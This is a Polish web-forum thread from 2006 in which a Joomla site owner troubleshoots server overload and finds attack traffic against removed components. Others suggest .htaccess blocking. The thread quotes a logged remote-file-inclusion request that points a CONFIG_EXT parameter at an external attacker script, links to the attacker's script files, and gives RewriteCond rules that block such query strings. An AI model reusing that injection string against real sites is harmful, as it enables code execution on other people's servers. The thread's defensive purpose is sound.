Mam nie lada problem poniewaz firma hostujaca zawiadomila mnie, że serwis ktory prowadzę poważnie obciąża maszyne na ktorej jest hostowany. Serwis dziala na Joomli, ponad rok czasu nie bylo z tym problemu do dzisiaj. Okazuje się ze komponentami ktore sprawiaja problem są:
- com_simpleboard
- com_extcalendar
- com_frontpage
com_extcalendar
Kalendarz usunałem poniewaz bez niego moge sie obejsc a poza tym w ostatnich miesiach i tak nie byl uzywany ale pliki były na ftpie. Pojawiły sie odwołania do nich :-O
com_simplebaord
Problem dla mnie stanowi kwestia jak mam sie uchronic przed przeciazeniem kiedy komponent ktory sprawia problem w rzeczywistosci nie istnieje. Innymi słowy simpleboard do ktorego sa odwolania nie jest u mnie uzywany. Kilka miesiecy temu zmieniłem go na SMF. Fizycznie nie ma plików simpleboarda na serwerze.
Przegladnałem logi i rzeczywiscie odwolania takie jak powyzej są, ale co z tym zrobic? Czy mozna to jakos zablokować?
com_frontpage
No i z tym tez mam problem poniewaz z tego zrezygnowac nie moge. Dziwne to troche bo komponent ów uzywany jest od roku tak samo... no nie wiem :/
z góry dzieki za rade
Jac
05-10-2006, 15:26
Jak nazywa się firma hostująca twoją stronę?
stone
05-10-2006, 17:24
Sprawdz w logach serwera kto to sie łączy, być może to ataki na Twoja strone wtedy zabloku w pliku .htaccess ip komputera z ktorego pochodzą te linki. Więcej info znajdziesz w dziale bezpieczeństwa na tym forum
absolon
05-10-2006, 20:51
Sprawdz w logach serwera kto to sie łączy, być może to ataki na Twoja strone wtedy zabloku w pliku .htaccess ip komputera z ktorego pochodzą te linki. Więcej info znajdziesz w dziale bezpieczeństwa na tym forum
wczytuje sie w uwagi podane w dziale bezpieczenstwo ale idąc za twoja radą sprawdzenia ip doszedłem wlasnie do zdumiewajacego odkrycia ze na liscie IP ktore wywołuja kompnent simpleboard jest rowniez moje IP! Mam stałe wiec napewno z mojego komputera. I teraz pytanie jak rozumiec cos takiego:
xx.xx.xx.xx - - [05/Oct/2006:14:44:23 +0200] "GET /templates/css/offline.css HTTP/1.1" 304 - "http://moja_strona/component/option,com_simpleboard/Itemid,33/func,view/catid,7/id,443/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" strona rzeczywiscie jest teraz offline stąd ...css/offline.css jest dla mnie zrozumiale, ale o co chodzi z tą scieżka dalej w ktorej wystepuje owe simpleboard.
podjerzewam ze cos w mojej joomli nie dziala jak trzeba - odkrywcze :), że caly czas simpleboard gdzies zalega, jakies wywołania.
W przypadku extcalendar mam takie interesujace rzeczy:
xx.xx.xx.xx - - [05/Oct/2006:18:09:48 +0200] "GET /component/option,com_extcalendar/Itemid,36/extmode,view/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://saids.com/c.txt? HTTP/1.1" 200 1010 "-" "libwww-perl/5.805"
Cholera jak to zwalczyć, komponenty ktorych fizycznie nie ma.
Ide czytać dalej.
pozdrawiam
Sova
05-10-2006, 22:17
Jac zadał Ci dobre pytanie - jak zwie się ta firma hostingowa?
Sam znam dwie, które w ostatnim czasie praktykują "wredne" (delikatnie powiedziane) traktowanie klienta wmawiając mu, że jego skrypty spowalniają serwer (ciągłe informowanie klienta o tym fakcie, po naprawie wskazanych przez użytkownika błędów, po pewnym czasie przychodzą kolejne informacje dotyczące kolejnych skryptów). No, ale w związku z tym firma wspaniałomyślnie proponuje/oferuje pozbycie sie tego problemu, a co za tym idzie zmianę serwera i oczywiście zmianę/wykupienie droższej usługi, najczęściej dedyka.
Mam nadzieję, że w Twoim przypadku to "tylko" ataki "shmackerów" - popatrz Sobie tutaj (to z podanej scieżki):
http://saids.com/c.txt
http://saids.com/botek.txt
- posłuż się .htaccess i zastopuj koleżków.
Ostatnio przez takie numery wywaliłem wszystkie biblioteki perla które mają coś wspólnego z apachem bo jakiś kretyn próbował się przez nie włamywać na serwer i serwer faktycznie tak zwisał że nawet "top" przez ssh nie można było uruchomić. :mad:
nexus246
06-10-2006, 10:15
Zablokuj htaccesem dostęp bezpośredni do tych plików, sprawdź czy na ftp nie podrzucono ci jakiś plików, włącz cache, przejrzyj pliki od com_frontpage i powyrzucaj zbędne rzeczy których nie używa twoja strona z nacciskiem na zapytania sql, podobnie zrób z wywoływaniem modułów (chociaż w powyższych poomożę tak czy inaczej keszowanie).
Jaki masz ruch na stronie? Generalnie mam takie wrażenie że ktoś tu ściemnia :) Jaki to hosting?
absolon
06-10-2006, 11:54
Witam!
Na wstepie dzieki za wsparcie, kazda sugestia jest cenna o ile umiem ją wykorzystac :). Przeglądnąłem angielskie forum i znalazlem wątek dotyczacy wlasnie tych dwoch komponentów - w owym czasie jakies dziury w nich były. Oczywiscie ja tych komponentów nie mam, nie mam takich katalogów etc.
Wstawilem sobie do htaccess takie cos:
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT(\[|\%20|\%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)
RewriteCond %{QUERY_STRING} sbp(=|\%20|\%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|\%20|\%3D)
Nadal jednak pojawiaja sie odwolania do simpleboard i extcalendar. Nawet google gdzies sie odowłują do tego simpleboard.
66.249.66.228 - - [06/Oct/2006:07:30:16 +0200] "GET /content/view/197/1/index.php?option=com_simpleboard&func=view&catid=6&id=3420 HTTP/1.1" 403 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
Czy ktos z forumowiczów byłby w stanie napisać - jaką konkretnie wstwić regułke do htaccess tak aby zablokować wszelkie wywołania które w adresie bedą zawierać com_simpleboard lub com_extcalendar? To byłoby dla mnie rozwiązanie.
Odpowiadając na pytania to chodzi o firme Netlook. Do tej pory bylo super ale juz nie jest.
Strona ma mozna by rzec sladową oglądalnosc - kilka tysięcy wizyt miesiecznie (~5tys). Nie ma tam plików do sciagania. Normalne obrazki, tekst. Jest tego troche ale tez bez przesady ... ok 300 artykułów, dziesiątki moze setki newsów, no i forum o umiarkowanym ruchu.
Zastanawia mnie to co napisal neo_fox z tym Pearlem - ja chyba go nie moge sobie ot tak wylaczyc mając hosting wirtualny? To chyba jezeli jest problem to w gestii administratora serwera jest?
Dalej:
Mam nadzieję, że w Twoim przypadku to "tylko" ataki "shmackerów" - popatrz Sobie tutaj (to z podanej scieżki):
http://saids.com/c.txt
http://saids.com/botek.txt
- posłuż się .htaccess i zastopuj koleżków.
Tak ja to przegladalem ale jak wlasnie zablokować "string" w htaccess? Bo jak zablokowac dane IP to wiem ale IP z ktorych pochodzą zapytania o ten simpleboard i extcalendar są dziesiątki :/